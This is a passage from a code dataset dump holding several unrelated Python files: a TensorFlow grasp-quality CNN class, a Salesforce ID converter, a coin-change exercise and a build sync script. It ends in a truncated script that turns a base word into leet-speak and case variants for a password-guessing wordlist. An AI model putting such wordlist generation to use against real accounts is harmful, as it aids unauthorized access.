conv2_1_filt_dim**2 * layer_channels\n conv2_1_std = np.sqrt(2.0 / (conv2_1_num_inputs))\n conv2_1W = tf.Variable(tf.truncated_normal(conv2_1_shape, stddev=conv2_1_std), name='conv2_1W')\n conv2_1b = tf.Variable(tf.truncated_normal([conv2_1_num_filt], stddev=conv2_1_std), name='conv2_1b')\n\n layer_height = layer_height / cfg['conv2_1']['pool_stride']\n layer_width = layer_width / cfg['conv2_1']['pool_stride']\n layer_channels = conv2_1_num_filt\n\n # conv2_2\n conv2_2_filt_dim = cfg['conv2_2']['filt_dim']\n conv2_2_num_filt = cfg['conv2_2']['num_filt']\n conv2_2_size = layer_height * layer_width * conv2_2_num_filt\n conv2_2_shape = [conv2_2_filt_dim, conv2_2_filt_dim, layer_channels, conv2_2_num_filt]\n\n conv2_2_num_inputs = conv2_2_filt_dim**2 * layer_channels\n conv2_2_std = np.sqrt(2.0 / (conv2_2_num_inputs))\n conv2_2W = tf.Variable(tf.truncated_normal(conv2_2_shape, stddev=conv2_2_std), name='conv2_2W')\n conv2_2b = tf.Variable(tf.truncated_normal([conv2_2_num_filt], stddev=conv2_2_std), name='conv2_2b')\n\n layer_height = layer_height / cfg['conv2_2']['pool_stride']\n layer_width = layer_width / cfg['conv2_2']['pool_stride']\n layer_channels = conv2_2_num_filt\n\n use_conv3 = False\n if 'conv3_1' in cfg.keys():\n use_conv3 = True\n\n if use_conv3:\n # conv3_1\n conv3_1_filt_dim = cfg['conv3_1']['filt_dim']\n conv3_1_num_filt = cfg['conv3_1']['num_filt']\n conv3_1_size = layer_height * layer_width * conv3_1_num_filt\n conv3_1_shape = [conv3_1_filt_dim, conv3_1_filt_dim, layer_channels, conv3_1_num_filt]\n \n conv3_1_num_inputs = conv3_1_filt_dim**2 * layer_channels\n conv3_1_std = np.sqrt(2.0 / (conv3_1_num_inputs))\n conv3_1W = tf.Variable(tf.truncated_normal(conv3_1_shape, stddev=conv3_1_std), name='conv3_1W')\n conv3_1b = tf.Variable(tf.truncated_normal([conv3_1_num_filt], stddev=conv3_1_std), name='conv3_1b')\n \n layer_height = layer_height / cfg['conv3_1']['pool_stride']\n layer_width = layer_width / cfg['conv3_1']['pool_stride']\n layer_channels = conv3_1_num_filt\n\n # conv3_2\n conv3_2_filt_dim = cfg['conv3_2']['filt_dim']\n conv3_2_num_filt = cfg['conv3_2']['num_filt']\n conv3_2_size = layer_height * layer_width * conv3_2_num_filt\n conv3_2_shape = [conv3_2_filt_dim, conv3_2_filt_dim, layer_channels, conv3_2_num_filt]\n \n conv3_2_num_inputs = conv3_2_filt_dim**2 * layer_channels\n conv3_2_std = np.sqrt(2.0 / (conv3_2_num_inputs))\n conv3_2W = tf.Variable(tf.truncated_normal(conv3_2_shape, stddev=conv3_2_std), name='conv3_2W')\n conv3_2b = tf.Variable(tf.truncated_normal([conv3_2_num_filt], stddev=conv3_2_std), name='conv3_2b')\n \n layer_height = layer_height / cfg['conv3_2']['pool_stride']\n layer_width = layer_width / cfg['conv3_2']['pool_stride']\n layer_channels = conv3_2_num_filt\n\n # fc3\n fc3_in_size = conv2_2_size\n if use_conv3:\n fc3_in_size = conv3_2_size\n fc3_out_size = cfg['fc3']['out_size']\n fc3_std = np.sqrt(2.0 / fc3_in_size)\n fc3W = tf.Variable(tf.truncated_normal([fc3_in_size, fc3_out_size], stddev=fc3_std), name='fc3W')\n fc3b = tf.Variable(tf.truncated_normal([fc3_out_size], stddev=fc3_std), name='fc3b')\n\n # pc1\n pc1_in_size = self._pose_dim\n pc1_out_size = cfg['pc1']['out_size']\n\n pc1_std = np.sqrt(2.0 / pc1_in_size)\n pc1W = tf.Variable(tf.truncated_normal([pc1_in_size, pc1_out_size],\n stddev=pc1_std), name='pc1W')\n pc1b = tf.Variable(tf.truncated_normal([pc1_out_size],\n stddev=pc1_std), name='pc1b')\n\n # pc2\n pc2_in_size = pc1_out_size\n pc2_out_size = cfg['pc2']['out_size']\n\n if pc2_out_size > 0:\n pc2_std = np.sqrt(2.0 / pc2_in_size)\n pc2W = tf.Variable(tf.truncated_normal([pc2_in_size, pc2_out_size],\n stddev=pc2_std), name='pc2W')\n pc2b = tf.Variable(tf.truncated_normal([pc2_out_size],\n stddev=pc2_std), name='pc2b')\n\n # fc4\n fc4_im_in_size = fc3_out_size\n if pc2_out_size == 0:\n fc4_pose_in_size = pc1_out_size\n else:\n fc4_pose_in_size = pc2_out_size\n fc4_out_size = cfg['fc4']['out_size']\n fc4_std = np.sqrt(2.0 / (fc4_im_in_size + fc4_pose_in_size))\n fc4W_im = tf.Variable(tf.truncated_normal([fc4_im_in_size, fc4_out_size], stddev=fc4_std), name='fc4W_im')\n fc4W_pose = tf.Variable(tf.truncated_normal([fc4_pose_in_size, fc4_out_size], stddev=fc4_std), name='fc4W_pose')\n fc4b = tf.Variable(tf.truncated_normal([fc4_out_size], stddev=fc4_std), name='fc4b')\n\n # fc5\n fc5_in_size = fc4_out_size\n fc5_out_size = cfg['fc5']['out_size']\n fc5_std = np.sqrt(2.0 / (fc5_in_size))\n fc5W = tf.Variable(tf.truncated_normal([fc5_in_size, fc5_out_size], stddev=fc5_std), name='fc5W')\n fc5b = tf.Variable(tf.constant(0.0, shape=[fc5_out_size]), name='fc5b')\n\n # create empty weight object and fill it up\n self._weights = GQCnnWeights()\n\n self._weights.conv1_1W = conv1_1W\n self._weights.conv1_1b = conv1_1b\n self._weights.conv1_2W = conv1_2W\n self._weights.conv1_2b = conv1_2b\n self._weights.conv2_1W = conv2_1W\n self._weights.conv2_1b = conv2_1b\n self._weights.conv2_2W = conv2_2W\n self._weights.conv2_2b = conv2_2b\n \n if use_conv3:\n self._weights.conv3_1W = conv3_1W\n self._weights.conv3_1b = conv3_1b\n self._weights.conv3_2W = conv3_2W\n self._weights.conv3_2b = conv3_2b\n\n self._weights.fc3W = fc3W\n self._weights.fc3b = fc3b\n self._weights.fc4W_im = fc4W_im\n self._weights.fc4W_pose = fc4W_pose\n self._weights.fc4b = fc4b\n self._weights.fc5W = fc5W\n self._weights.fc5b = fc5b\n self._weights.pc1W = pc1W\n self._weights.pc1b = pc1b\n\n if pc2_out_size > 0:\n self._weights.pc2W = pc2W\n self._weights.pc2b = pc2b\n\n def _parse_config(self, config):\n \"\"\" Parses configuration file for this GQCNN \n\n Parameters\n ----------\n config : dict\n python dictionary of configuration parameters such as architecure and basic data params such as batch_size for prediction,\n im_height, im_width, ... \n \"\"\"\n\n # load tensor params\n self._batch_size = config['batch_size']\n self._im_height = config['im_height']\n self._im_width = config['im_width']\n self._num_channels = config['im_channels']\n self._input_data_mode = config['input_data_mode']\n\n # setup correct pose dimensions \n if self._input_data_mode == InputDataMode.TF_IMAGE:\n # depth\n self._pose_dim = 1\n elif self._input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE:\n # depth, cx, cy\n self._pose_dim = 3\n elif self._input_data_mode == InputDataMode.RAW_IMAGE:\n # u, v, depth, theta\n self._pose_dim = 4\n elif self._input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE:\n # u, v, depth, theta, cx, cy\n self._pose_dim = 6\n\n # create feed tensors for prediction\n self._input_im_arr = np.zeros([self._batch_size, self._im_height,\n self._im_width, self._num_channels])\n self._input_pose_arr = np.zeros([self._batch_size, self._pose_dim])\n\n # load architecture\n self._architecture = config['architecture']\n self._use_conv3 = False\n if 'conv3_1' in self._architecture.keys():\n self._use_conv3 = True\n self._use_pc2 = False\n if self._architecture['pc2']['out_size'] > 0:\n self._use_pc2 = True\n\n # get in and out sizes of fully-connected layer for possible re-initialization\n self.pc2_out_size = self._architecture['pc2']['out_size']\n self.pc1_in_size = self._pose_dim\n self.pc1_out_size = self._architecture['pc1']['out_size']\n self.fc3_in_size = self._architecture['pc2']['out_size']\n self.fc3_out_size = self._architecture['fc3']['out_size']\n self.fc4_in_size = self._architecture['fc3']['out_size']\n self.fc4_out_size = self._architecture['fc4']['out_size'] \n self.fc5_in_size = self._architecture['fc4']['out_size']\n self.fc5_out_size = self._architecture['fc5']['out_size']\n\n if self.pc2_out_size == 0:\n self.fc4_pose_in_size = self.pc1_out_size\n else:\n self.fc4_pose_in_size = self.pc2_out_size\n\n # load normalization constants\n self.normalization_radius = config['radius']\n self.normalization_alpha = config['alpha']\n self.normalization_beta = config['beta']\n self.normalization_bias = config['bias']\n\n # initialize means and standard deviation to be 0 and 1, respectively\n self._im_mean = 0\n self._im_std = 1\n self._pose_mean = np.zeros(self._pose_dim)\n self._pose_std = np.ones(self._pose_dim)\n\n def initialize_network(self, add_softmax=True):\n \"\"\" Set up input nodes and builds network.\n\n Parameters\n ----------\n add_softmax : float\n whether or not to add a softmax layer\n \"\"\"\n\n with self._graph.as_default():\n # setup tf input placeholders and build network\n self._input_im_node = tf.placeholder(\n tf.float32, (self._batch_size, self._im_height, self._im_width, self._num_channels))\n self._input_pose_node = tf.placeholder(\n tf.float32, (self._batch_size, self._pose_dim))\n\n # build network\n self._output_tensor = self._build_network(self._input_im_node, self._input_pose_node)\n if add_softmax:\n self.add_softmax_to_predict()\n\n def open_session(self):\n \"\"\" Open tensorflow session \"\"\"\n with self._graph.as_default():\n init = tf.global_variables_initializer()\n # create custom config that tells tensorflow to allocate GPU memory \n # as needed so it is possible to run multiple tf sessions on the same GPU\n self.tf_config = tf.ConfigProto()\n self.tf_config.gpu_options.allow_growth = True\n self._sess = tf.Session(config = self.tf_config)\n self._sess.run(init)\n return self._sess\n\n def close_session(self):\n \"\"\" Close tensorflow session \"\"\"\n with self._graph.as_default():\n self._sess.close()\n self._sess = None\n\n @property\n def batch_size(self):\n return self._batch_size\n\n @property\n def im_height(self):\n return self._im_height\n\n @property\n def im_width(self):\n return self._im_width\n\n @property\n def im_mean(self):\n return self._im_mean\n\n @property\n def im_std(self):\n return self._im_std\n\n @property\n def pose_mean(self):\n return self._pose_mean\n\n @property\n def pose_std(self):\n return self._pose_std\n\n @property\n def num_channels(self):\n return self._num_channels\n\n @property\n def pose_dim(self):\n return self._pose_dim\n\n @property\n def input_data_mode(self):\n return self._input_data_mode\n\n @property\n def input_im_node(self):\n return self._input_im_node\n\n @property\n def input_pose_node(self):\n return self._input_pose_node\n\n @property\n def output(self):\n return self._output_tensor\n\n @property\n def weights(self):\n return self._weights\n\n @property\n def graph(self):\n return self._graph\n\n def update_im_mean(self, im_mean):\n \"\"\" Updates image mean to be used for normalization when predicting \n \n Parameters\n ----------\n im_mean : float\n image mean to be used\n \"\"\"\n self._im_mean = im_mean\n \n def get_im_mean(self):\n \"\"\" Get the current image mean to be used for normalization when predicting\n\n Returns\n -------\n : float\n image mean\n \"\"\"\n return self.im_mean\n\n def update_im_std(self, im_std):\n \"\"\" Updates image standard deviation to be used for normalization when predicting \n \n Parameters\n ----------\n im_std : float\n image standard deviation to be used\n \"\"\"\n self._im_std = im_std\n\n def get_im_std(self):\n \"\"\" Get the current image standard deviation to be used for normalization when predicting\n\n Returns\n -------\n : float\n image standard deviation\n \"\"\"\n return self.im_std\n\n def update_pose_mean(self, pose_mean):\n \"\"\" Updates pose mean to be used for normalization when predicting \n \n Parameters\n ----------\n pose_mean :obj:`tensorflow Tensor`\n pose mean to be used\n \"\"\"\n self._pose_mean = pose_mean\n\n def get_pose_mean(self):\n \"\"\" Get the current pose mean to be used for normalization when predicting\n\n Returns\n -------\n :obj:`tensorflow Tensor`\n pose mean\n \"\"\"\n return self._pose_mean\n\n def update_pose_std(self, pose_std):\n \"\"\" Updates pose standard deviation to be used for normalization when predicting \n \n Parameters\n ----------\n pose_std :obj:`tensorflow Tensor`\n pose standard deviation to be used\n \"\"\"\n self._pose_std = pose_std\n\n def get_pose_std(self):\n \"\"\" Get the current pose standard deviation to be used for normalization when predicting\n\n Returns\n -------\n :obj:`tensorflow Tensor`\n pose standard deviation\n \"\"\"\n return self._pose_std\n \n def add_softmax_to_predict(self):\n \"\"\" Adds softmax to output tensor of prediction network \"\"\"\n self._output_tensor = tf.nn.softmax(self._output_tensor)\n\n def update_batch_size(self, batch_size):\n \"\"\" Updates the prediction batch size \n\n Parameters\n ----------\n batch_size : float\n batch size to be used for prediction\n \"\"\"\n self._batch_size = batch_size\n\n def predict(self, image_arr, pose_arr):\n \"\"\" Predict a set of images in batches \n\n Parameters\n ----------\n image_arr : :obj:`tensorflow Tensor`\n 4D Tensor of images to be predicted\n pose_arr : :obj:`tensorflow Tensor`\n 4D Tensor of poses to be predicted\n \"\"\"\n\n # setup prediction\n num_images = image_arr.shape[0]\n num_poses = pose_arr.shape[0]\n output_arr = np.zeros([num_images, self.fc5_out_size])\n if num_images != num_poses:\n raise ValueError('Must provide same number of images and poses')\n\n # predict by filling in image array in batches\n close_sess = False\n with self._graph.as_default():\n if self._sess is None:\n close_sess = True\n self.open_session()\n i = 0\n while i < num_images:\n logging.debug('Predicting file %d' % (i))\n dim = min(self._batch_size, num_images - i)\n cur_ind = i\n end_ind = cur_ind + dim\n self._input_im_arr[:dim, :, :, :] = (\n image_arr[cur_ind:end_ind, :, :, :] - self._im_mean) / self._im_std\n self._input_pose_arr[:dim, :] = (\n pose_arr[cur_ind:end_ind, :] - self._pose_mean) / self._pose_std\n\n gqcnn_output = self._sess.run(self._output_tensor,\n feed_dict={self._input_im_node: self._input_im_arr,\n self._input_pose_node: self._input_pose_arr})\n output_arr[cur_ind:end_ind, :] = gqcnn_output[:dim, :]\n\n i = end_ind\n if close_sess:\n self.close_session()\n return output_arr\n\t\t\n @property\n def filters(self):\n \"\"\" Returns the set of conv1_1 filters \n\n Returns\n -------\n :obj:`tensorflow Tensor`\n filters(weights) from conv1_1 of the network\n \"\"\"\n\n close_sess = False\n if self._sess is None:\n close_sess = True\n self.open_session()\n\n filters = self._sess.run(self._weights.conv1_1W)\n\n if close_sess:\n self.close_session()\n return filters\n\n def _build_network(self, input_im_node, input_pose_node, drop_fc3=False, drop_fc4=False, fc3_drop_rate=0, fc4_drop_rate=0):\n \"\"\" Builds neural network \n\n Parameters\n ----------\n input_im_node : :obj:`tensorflow Placeholder`\n network input image placeholder\n input_pose_node : :obj:`tensorflow Placeholder`\n network input pose placeholder\n drop_fc3 : bool\n boolean value whether to drop third fully-connected layer or not to reduce over_fitting\n drop_fc4 : bool\n boolean value whether to drop fourth fully-connected layer or not to reduce over_fitting\n fc3_drop_rate : float\n drop rate for third fully-connected layer\n fc4_drop_rate : float\n drop rate for fourth fully-connected layer\n\n Returns\n -------\n :obj:`tensorflow Tensor`\n output of network\n \"\"\"\n\n # conv1_1\n conv1_1h = tf.nn.relu(tf.nn.conv2d(input_im_node, self._weights.conv1_1W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv1_1b)\n if self._architecture['conv1_1']['norm']:\n if self._architecture['conv1_1']['norm_type'] == \"local_response\":\n \tconv1_1h = tf.nn.local_response_normalization(conv1_1h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool1_1_size = self._architecture['conv1_1']['pool_size']\n pool1_1_stride = self._architecture['conv1_1']['pool_stride']\n pool1_1 = tf.nn.max_pool(conv1_1h,\n ksize=[1, pool1_1_size, pool1_1_size, 1],\n strides=[1, pool1_1_stride,\n pool1_1_stride, 1],\n padding='SAME')\n conv1_1_num_nodes = reduce_shape(pool1_1.get_shape())\n conv1_1_flat = tf.reshape(pool1_1, [-1, conv1_1_num_nodes])\n\n # conv1_2\n conv1_2h = tf.nn.relu(tf.nn.conv2d(pool1_1, self._weights.conv1_2W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv1_2b)\n if self._architecture['conv1_2']['norm']:\n if self._architecture['conv1_2']['norm_type'] == \"local_response\":\n \tconv1_2h = tf.nn.local_response_normalization(conv1_2h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool1_2_size = self._architecture['conv1_2']['pool_size']\n pool1_2_stride = self._architecture['conv1_2']['pool_stride']\n pool1_2 = tf.nn.max_pool(conv1_2h,\n ksize=[1, pool1_2_size, pool1_2_size, 1],\n strides=[1, pool1_2_stride,\n pool1_2_stride, 1],\n padding='SAME')\n conv1_2_num_nodes = reduce_shape(pool1_2.get_shape())\n conv1_2_flat = tf.reshape(pool1_2, [-1, conv1_2_num_nodes])\n\n # conv2_1\n conv2_1h = tf.nn.relu(tf.nn.conv2d(pool1_2, self._weights.conv2_1W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv2_1b)\n if self._architecture['conv2_1']['norm']:\n if self._architecture['conv2_1']['norm_type'] == \"local_response\":\n \tconv2_1h = tf.nn.local_response_normalization(conv2_1h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool2_1_size = self._architecture['conv2_1']['pool_size']\n pool2_1_stride = self._architecture['conv2_1']['pool_stride']\n pool2_1 = tf.nn.max_pool(conv2_1h,\n ksize=[1, pool2_1_size, pool2_1_size, 1],\n strides=[1, pool2_1_stride,\n pool2_1_stride, 1],\n padding='SAME')\n conv2_1_num_nodes = reduce_shape(pool2_1.get_shape())\n conv2_1_flat = tf.reshape(pool2_1, [-1, conv2_1_num_nodes])\n\n # conv2_2\n conv2_2h = tf.nn.relu(tf.nn.conv2d(pool2_1, self._weights.conv2_2W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv2_2b)\n if self._architecture['conv2_2']['norm']:\n if self._architecture['conv2_2']['norm_type'] == \"local_response\":\n \tconv2_2h = tf.nn.local_response_normalization(conv2_2h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool2_2_size = self._architecture['conv2_2']['pool_size']\n pool2_2_stride = self._architecture['conv2_2']['pool_stride']\n pool2_2 = tf.nn.max_pool(conv2_2h,\n ksize=[1, pool2_2_size, pool2_2_size, 1],\n strides=[1, pool2_2_stride,\n pool2_2_stride, 1],\n padding='SAME')\n conv2_2_num_nodes = reduce_shape(pool2_2.get_shape())\n conv2_2_flat = tf.reshape(pool2_2, [-1, conv2_2_num_nodes])\n\n if self._use_conv3:\n # conv3_1\n conv3_1h = tf.nn.relu(tf.nn.conv2d(pool2_2, self._weights.conv3_1W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv3_1b)\n if self._architecture['conv3_1']['norm']:\n \tif self._architecture['conv3_1']['norm_type'] == \"local_response\":\n \tconv3_1h = tf.nn.local_response_normalization(conv3_1h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool3_1_size = self._architecture['conv3_1']['pool_size']\n pool3_1_stride = self._architecture['conv3_1']['pool_stride']\n pool3_1 = tf.nn.max_pool(conv3_1h,\n ksize=[1, pool3_1_size, pool3_1_size, 1],\n strides=[1, pool3_1_stride,\n pool3_1_stride, 1],\n padding='SAME')\n conv3_1_num_nodes = reduce_shape(pool3_1.get_shape())\n conv3_1_flat = tf.reshape(pool3_1, [-1, conv3_1_num_nodes])\n\n # conv3_2\n conv3_2h = tf.nn.relu(tf.nn.conv2d(pool3_1, self._weights.conv3_2W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv3_2b)\n if self._architecture['conv3_2']['norm']:\n \tif self._architecture['conv3_2']['norm_type'] == \"local_response\":\n \tconv3_2h = tf.nn.local_response_normalization(conv3_2h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool3_2_size = self._architecture['conv3_2']['pool_size']\n pool3_2_stride = self._architecture['conv3_2']['pool_stride']\n pool3_2 = tf.nn.max_pool(conv3_2h,\n ksize=[1, pool3_2_size, pool3_2_size, 1],\n strides=[1, pool3_2_stride,\n pool3_2_stride, 1],\n padding='SAME')\n conv3_2_num_nodes = reduce_shape(pool3_2.get_shape())\n conv3_2_flat = tf.reshape(pool3_2, [-1, conv3_2_num_nodes])\n\n # fc3\n if self._use_conv3:\n fc3 = tf.nn.relu(tf.matmul(conv3_2_flat, self._weights.fc3W) +\n self._weights.fc3b)\n else:\n fc3 = tf.nn.relu(tf.matmul(conv2_2_flat, self._weights.fc3W) +\n self._weights.fc3b)\n\n # drop fc3 if necessary\n if drop_fc3:\n fc3 = tf.nn.dropout(fc3, fc3_drop_rate)\n\n # pc1\n pc1 = tf.nn.relu(tf.matmul(input_pose_node, self._weights.pc1W) +\n self._weights.pc1b)\n\n if self._use_pc2:\n # pc2\n pc2 = tf.nn.relu(tf.matmul(pc1, self._weights.pc2W) +\n self._weights.pc2b)\n # fc4\n fc4 = tf.nn.relu(tf.matmul(fc3, self._weights.fc4W_im) +\n tf.matmul(pc2, self._weights.fc4W_pose) +\n self._weights.fc4b)\n else:\n # fc4\n fc4 = tf.nn.relu(tf.matmul(fc3, self._weights.fc4W_im) +\n tf.matmul(pc1, self._weights.fc4W_pose) +\n self._weights.fc4b)\n\n # drop fc4 if necessary\n if drop_fc4:\n fc4 = tf.nn.dropout(fc4, fc4_drop_rate)\n\n # fc5\n fc5 = tf.matmul(fc4, self._weights.fc5W) + self._weights.fc5b\n\n return fc5\n","sub_path":"gqcnn/neural_networks.py","file_name":"neural_networks.py","file_ext":"py","file_size_in_byte":38931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"617151563","text":"from exceptions import ValueError\n\n\ndef convert_id_15_to_18(sf_id):\n chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n full_chars = chars + '012345'\n\n if not sf_id or len(sf_id) not in (15, 18):\n raise ValueError('SalesForce id must be string value with length 15 or 18 symbols')\n\n if 18 == len(sf_id):\n return sf_id\n\n chunks = [ sf_id[i:i + 5] for i in range(0, 15, 5)]\n suffix = ''\n for chunk in chunks:\n reversed_chunk = chunk[::-1]\n binary_id_str = ''.join(['1' if i in chars else '0' for i in reversed_chunk])\n suffix += full_chars[int(binary_id_str, 2)]\n return sf_id + suffix\n\n\n\n","sub_path":"salesforce_id_converter.py","file_name":"salesforce_id_converter.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"343282112","text":"import sys\n# 거스름돈 (탐욕적기법)\n\ndef coinChange(n):\n '''\n n원을 돌려주기 위해 필요한 동전 개수의 최솟값을 반환하는 함수를 작성하세요.\n\n 1, 5, 10, 50, 100\n '''\n\n coins = [100, 50, 10, 5, 1]\n result = 0\n\n for c in coins: # 큰 수 부터 주기\n result += n // c\n n -= c * (n // c) # 남은액수가 나옴\n\n return result\n\n\ndef main():\n '''\n 이 부분은 수정하지 마세요.\n '''\n\n n = int(input())\n\n print(coinChange(n))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"elice_example/coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"8445240","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Hardlinked at SHARED/sync.py\n\n# I use this common file to sync headers and binaries from source trees,\n# assuming all source trees are accessible from the common path, ../\n#\n# vendor - various third-party libraries\n# https://github.com/golightlyb/vendor\n\n\nimport os, sys, filecmp, shutil\n\nquiet = False\n\ntargets = [\n 'linux32', 'linux32-debug', 'linux32-profile',\n 'linux64', 'linux64-debug', 'linux64-profile',\n 'win32', 'win32-debug', 'win32-profile',\n 'win64', 'win64-debug', 'win64-profile',\n]\n\nrules = {\n 'cfw': [\n ('!mkdir', 'include/cfw'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../cfw/src/cfw/base.h', 'include/cfw/'),\n ('../cfw/src/cfw/base_mmgr.h', 'include/cfw/'),\n ('../cfw/src/cfw/base_notice.h', 'include/cfw/'),\n ('../cfw/src/cfw/base_tmgr.h', 'include/cfw/'),\n ('../cfw/src/cfw/collection.h', 'include/cfw/'),\n ('../cfw/bin/$(TARGET)/cfw.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-jpeg': [\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/jpeglib.h', 'include/'),\n ('../vendor/include/jerror.h', 'include/'),\n ('../vendor/include/jconfig.h', 'include/'),\n ('../vendor/include/jmorecfg.h', 'include/'),\n ('../vendor/bin/$(TARGET)/jpeg-9b.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-png': [\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/png.h', 'include/'),\n ('../vendor/include/pngconf.h', 'include/'),\n ('../vendor/include/pnglibconf.h', 'include/'),\n ('../vendor/bin/$(TARGET)/libpng.a', 'lib/$(TARGET)/'),\n ], \n 'vendor-glfw': [\n ('!mkdir', 'include/GLFW'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/GLFW/glfw3.h', 'include/GLFW/'),\n ('../vendor/include/GLFW/glfw3native.h','include/GLFW/'),\n ('../vendor/bin/$(TARGET)/glfw.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-gl3w.h': [\n ('!mkdir', 'include/gl3w'),\n ('../vendor/include/gl3w/glcorearb.h', 'include/gl3w/'),\n ('../vendor/include/gl3w/gl3w.h', 'include/gl3w/'),\n ('../vendor/include/gl3w/wglext.h', 'include/gl3w/'),\n ('../vendor/include/gl3w/glxext.h', 'include/gl3w/'),\n ],\n 'vendor-soundio': [\n ('!mkdir', 'include'),\n ('!mkdir', 'include/soundio'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/soundio/endian.h', 'include/soundio/'),\n ('../vendor/include/soundio/soundio.h', 'include/soundio/'),\n ('../vendor/bin/$(TARGET)/libsoundio.a','lib/$(TARGET)/'),\n ], \n 'vendor-isaac': [\n ('!mkdir', 'include'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/isaac.h', 'include/'),\n ('../vendor/bin/$(TARGET)/isaac.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-xxhash': [\n ('!mkdir', 'include'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/xxhash.h', 'include/'),\n ('../vendor/bin/$(TARGET)/xxhash.o', 'lib/$(TARGET)/'),\n ],\n 'vendor-zlib': [\n ('!mkdir', 'include'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/zlib.h', 'include/'),\n ('../vendor/include/zconf.h', 'include/'),\n ('../vendor/bin/$(TARGET)/zlib.a', 'lib/$(TARGET)/'),\n ],\n}\n\ndef cp(src, dest):\n dest += os.path.basename(src)\n status = '=='\n \n try:\n if not filecmp.cmp(src, dest):\n status = '>>'\n shutil.copy2(src, dest)\n except FileNotFoundError:\n status = '++'\n shutil.copy2(src, dest)\n \n if not quiet:\n print(\"%s%s%s\" % (src.ljust(44), status, dest.rjust(34)))\n\n\ndef mkdir(at):\n os.makedirs(at, exist_ok=True)\n\nif len(sys.argv) >= 2:\n for i in sys.argv[1:]:\n if i.startswith('--'):\n i = i[2:]\n if i == 'quiet':\n quiet = True\n else:\n print(\"unkown flag %s\" % i)\n sys.exit(1)\n else:\n if i not in rules:\n print(\"unkown command %s\" % i)\n sys.exit(1)\n\n for ruleid, mappings in rules.items():\n if ruleid in sys.argv[1:]:\n for (src, dest) in mappings:\n if not src.startswith('!'):\n if '$' in src+dest:\n for target in targets:\n _src = src.replace ('$(TARGET)', target)\n _dest = dest.replace('$(TARGET)', target)\n cp(_src, _dest)\n else:\n cp(src, dest)\n else:\n if '$' in dest:\n for target in targets:\n _dest = dest.replace('$(TARGET)', target)\n mkdir(_dest)\n else:\n mkdir(dest)\n sys.exit(0)\n\nname = sys.argv[0]\nprint(\"usage: %s RULE[, RULE, ...] [--quiet]\" % name)\nfor ruleid, mapping in rules.items():\n print(\" %s %s\" % (name, ruleid))\nsys.exit(1)\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229777119","text":"\n\nimport sys\nimport time\n\nbase=sys.argv[1]\n\nwordlist=open(base+\".txt\",\"a\")\nglobal wdbase\nwdbase=[]\n\ndef leet_lite():\n baseleet=base.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n baseleet=baseleet.replace(\"o\",\"0\")\n global baseleetlite\n baseleetlite=baseleet\n\n\n\n\n\ndef leet_medio():\n baseleet=base.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n baseleet=baseleet.replace(\"o\",\"0\")\n baseleet=baseleet.replace(\"t\",\"7\")\n baseleet=baseleet.replace(\"l\",\"1\")\n baseleet=baseleet.replace(\"s\",\"5\")\n global baseleetmedio\n baseleetmedio=baseleet\n\n\ndef leet_foda():\n baseleet=base.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n baseleet=baseleet.replace(\"o\",\"0\")\n baseleet=baseleet.replace(\"t\",\"7\")\n baseleet=baseleet.replace(\"s\",\"5\")\n global leetfoda\n leetfoda=baseleet.replace(\"g\",\"6\")\n leetfoda=leetfoda.replace(\"i\",\"1\")\n\n\n\n\ndef base_parcial_upper():\n global leters\n leters=[\"b\",\"c\",\"d\",\"f\",\"g\",\"h\",\"j\",\"k\",\"l\",\"m\",\"n\",\"p\",\"q\",\"r\",\"s\",\"t\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n global baseupper\n baseupper=\"\"\n for a in base:\n if a in leters:\n baseupper+=a.upper()\n else:\n baseupper+=a\n\ndef vogalupper():\n let=[\"a\",\"e\",\"i\",\"o\",\"u\"]\n global vogalup\n 